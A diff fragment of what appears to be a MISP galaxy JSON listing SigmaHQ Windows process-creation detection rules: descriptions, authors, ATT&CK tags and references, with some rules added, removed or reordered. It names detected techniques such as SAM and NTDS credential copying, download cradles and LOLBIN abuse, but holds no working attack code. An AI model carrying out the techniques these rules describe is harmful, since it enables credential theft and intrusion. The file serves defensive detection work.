- "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"
],
"tags": [
@@ -74386,41 +71213,6 @@
"uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183",
"value": "Port Forwarding Attempt Via SSH"
},
- {
- "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations",
- "meta": {
- "author": "Florian Roth (Nextron Systems), @neonprimetime",
- "creation_date": "2021/09/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_40444.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.joesandbox.com/analysis/476188/1/iochtml",
- "https://twitter.com/neonprimetime/status/1435584010202255375",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_40444.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "related": [
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "894397c6-da03-425c-a589-3d09e7d1f750",
- "value": "Potential CVE-2021-40444 Exploitation Attempt"
- },
{
"description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example",
"meta": {
@@ -74435,9 +71227,9 @@
"logsource.product": "windows",
"refs": [
"https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
"https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml"
],
"tags": [
@@ -74547,6 +71339,41 @@
"uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba",
"value": "Net WebClient Casing Anomalies"
},
+ {
+ "description": "Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start a instance with custom extensions",
+ "meta": {
+ "author": "Aedan Russell, frack113, X__Junior (Nextron Systems)",
+ "creation_date": "2022/06/19",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_browsers_chromium_susp_load_extension.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.mandiant.com/resources/blog/lnk-between-browsers",
+ "https://redcanary.com/blog/chromeloader/",
+ "https://emkc.org/s/RJjuLa",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1176"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e",
+ "value": "Suspicious Chromium Browser Instance Executed With Custom Extensions"
+ },
{
"description": "Detects suspicious process run from unusual locations",
"meta": {
@@ -74594,9 +71421,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
"https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/",
"https://github.com/jpillora/chisel/",
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_chisel.yml"
],
"tags": [
@@ -74665,9 +71492,9 @@
"refs": [
"https://twitter.com/bohops/status/980659399495741441",
"https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712",
- "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
- "https://twitter.com/JohnLaTwC/status/1223292479270600706",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
+ "https://twitter.com/JohnLaTwC/status/1223292479270600706",
+ "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml"
],
"tags": [
@@ -74747,11 +71574,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/",
+ "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe",
"https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html",
- "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/",
"https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html",
- "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_susp_execution.yml"
],
"tags": [
@@ -74845,100 +71672,6 @@
"uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac",
"value": "Net.exe Execution"
},
- {
- "description": "Detects activity that could be related to Baby Shark malware",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/02/24",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_babyshark.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_babyshark.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion",
- "attack.discovery",
- "attack.t1012",
- "attack.t1059.003",
- "attack.t1059.001",
- "attack.t1218.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35",
- "value": "Potential Baby Shark Malware Activity"
- },
- {
- "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020",
- "meta": {
- "author": "Markus Neis, Swisscom",
- "creation_date": "2020/06/18",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_ke3chang_tidepool.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
- "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ke3chang_tidepool.yml"
- ],
- "tags": [
- "attack.g0004",
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7b544661-69fc-419f-9a59-82ccc328f205",
- "value": "Potential Ke3chang/TidePool Malware Activity"
- },
{
"description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n",
"meta": {
@@ -74952,8 +71685,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp",
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml"
],
@@ -74974,57 +71707,6 @@
"uuid": "1dd05363-104e-4b4a-b963-196a534b03a1",
"value": "Potential Suspicious Mofcomp Execution"
},
- {
- "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro",
- "creation_date": "2019/11/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2019_1378.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068",
- "attack.execution",
- "attack.t1059.003",
- "attack.t1574",
- "cve.2019.1378"
- ]
- },
- "related": [
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5",
- "value": "Exploiting SetupComplete.cmd CVE-2019-1378"
- },
{
"description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n",
"meta": {
@@ -75039,8 +71721,8 @@
"logsource.product": "windows",
"refs": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/",
- "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/",
"https://twitter.com/pabraeken/status/993298228840992768",
+ "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"
],
"tags": [
@@ -75149,42 +71831,6 @@
"uuid": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6",
"value": "Mstsc.EXE Execution From Uncommon Parent"
},
- {
- "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023",
- "meta": {
- "author": "TropChaud",
- "creation_date": "2023/01/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/",
- "https://twitter.com/anfam17/status/1607477672057208835",
- "https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88",
- "https://www.joesandbox.com/analysis/790122/0/html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5",
- "value": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE"
- },
{
"description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name",
"meta": {
@@ -75297,9 +71943,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
"https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394",
"http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"
],
"tags": [
@@ -75332,10 +71978,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/nas_bench/status/1535322450858233858",
- "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/",
"https://twitter.com/CyberRaiju/status/1273597319322058752",
"https://twitter.com/bohops/status/1276357235954909188?s=12",
+ "https://twitter.com/nas_bench/status/1535322450858233858",
+ "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"
],
"tags": [
@@ -75435,8 +72081,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
"https://twitter.com/jseerden/status/1247985304667066373/photo/1",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
"https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension",
"https://twitter.com/lefterispan/status/1286259016436514816",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml"
@@ -75580,8 +72226,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/Oddvarmoe/status/985518877076541440",
"https://lolbas-project.github.io/lolbas/Binaries/Print/",
+ "https://twitter.com/Oddvarmoe/status/985518877076541440",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"
],
"tags": [
@@ -75673,8 +72319,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/BloodHoundAD/SharpHound",
"https://github.com/BloodHoundAD/BloodHound",
+ "https://github.com/BloodHoundAD/SharpHound",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml"
],
"tags": [
@@ -75781,13 +72427,13 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/tag/ntds-dit/",
- "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
"https://github.com/zcgonvh/NTDSDumpEx",
- "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
"https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
+ "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
+ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
"https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1",
+ "https://pentestlab.blog/tag/ntds-dit/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml"
],
"tags": [
@@ -75992,8 +72638,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://ss64.com/nt/mklink.html",
"https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md",
+ "https://ss64.com/nt/mklink.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml"
],
"tags": [
@@ -76158,8 +72804,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Replace/",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace",
+ "https://lolbas-project.github.io/lolbas/Binaries/Replace/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"
],
"tags": [
@@ -76225,8 +72871,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/med0x2e/vba2clr",
"https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic",
+ "https://github.com/med0x2e/vba2clr",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_parent.yml"
],
"tags": [
@@ -76339,9 +72985,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
"https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
- "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml"
],
"tags": [
@@ -76430,8 +73076,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/harr0ey/status/991670870384021504",
"https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml",
+ "https://twitter.com/harr0ey/status/991670870384021504",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml"
],
"tags": [
@@ -76497,9 +73143,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
"https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
"https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml"
],
"tags": [
@@ -76675,8 +73321,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mrd0x/status/1463526834918854661",
"https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5",
+ "https://twitter.com/mrd0x/status/1463526834918854661",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml"
],
"tags": [
@@ -76739,43 +73385,6 @@
"uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7",
"value": "Invoke-Obfuscation COMPRESS OBFUSCATION"
},
- {
- "description": "Detects Elise backdoor activity used by APT32",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2018/01/31",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_elise.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting",
- "https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_elise.yml"
- ],
- "tags": [
- "attack.g0030",
- "attack.g0050",
- "attack.s0081",
- "attack.execution",
- "attack.t1059.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f",
- "value": "Elise Backdoor Activity"
- },
{
"description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary",
"meta": {
@@ -76932,9 +73541,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini",
- "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml"
],
"tags": [
@@ -77027,7 +73636,7 @@
"author": "Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2023/04/18",
"falsepositive": [
- "Likelihood is related to how often the paths are used in the environement"
+ "Likelihood is related to how often the paths are used in the environment"
],
"filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml",
"level": "high",
@@ -77134,29 +73743,6 @@
"uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23",
"value": "Nslookup PowerShell Download Cradle - ProcessCreation"
},
- {
- "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)",
- "creation_date": "2022/11/10",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/filip_dragovic/status/1590104354727436290",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120",
- "https://twitter.com/filip_dragovic/status/1590052248260055041",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3",
- "value": "Suspicious Sysmon as Execution Parent"
- },
{
"description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process",
"meta": {
@@ -77229,8 +73815,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
- "https://ss64.com/bash/rar.html",
"https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/",
+ "https://ss64.com/bash/rar.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml"
],
"tags": [
@@ -77273,31 +73859,6 @@
"uuid": "0b0cd537-fc77-4e6e-a973-e53495c1083d",
"value": "Renamed Office Binary Execution"
},
- {
- "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/04/17",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/kagancapar/status/1515219358234161153",
- "https://github.com/kagancapar/CVE-2022-29072",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2022_29072_7zip.yml"
- ],
- "tags": [
- "attack.execution",
- "cve.2022.29072"
- ]
- },
- "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3",
- "value": "Potential CVE-2022-29072 Exploitation Attempt"
- },
{
"description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files",
"meta": {
@@ -77311,9 +73872,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/",
"https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_office.yml"
],
@@ -77348,8 +73909,8 @@
"logsource.product": "windows",
"refs": [
"https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e",
- "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/netero1010/TrustedPath-UACBypass-BOF",
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml"
],
"tags": [
@@ -77382,8 +73943,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
"https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
+ "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml"
],
"tags": [
@@ -77478,6 +74039,40 @@
"uuid": "1af57a4b-460a-4738-9034-db68b880c665",
"value": "PowerShell SAM Copy"
},
+ {
+ "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.",
+ "meta": {
+ "author": "pH-T (Nextron Systems)",
+ "creation_date": "2023/04/17",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_hktl_certify.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/GhostPack/Certify",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certify.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.credential_access",
+ "attack.t1649"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "762f2482-ff21-4970-8939-0aa317a886bb",
+ "value": "HackTool - Certify Execution"
+ },
{
"description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument",
"meta": {
@@ -77491,8 +74086,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
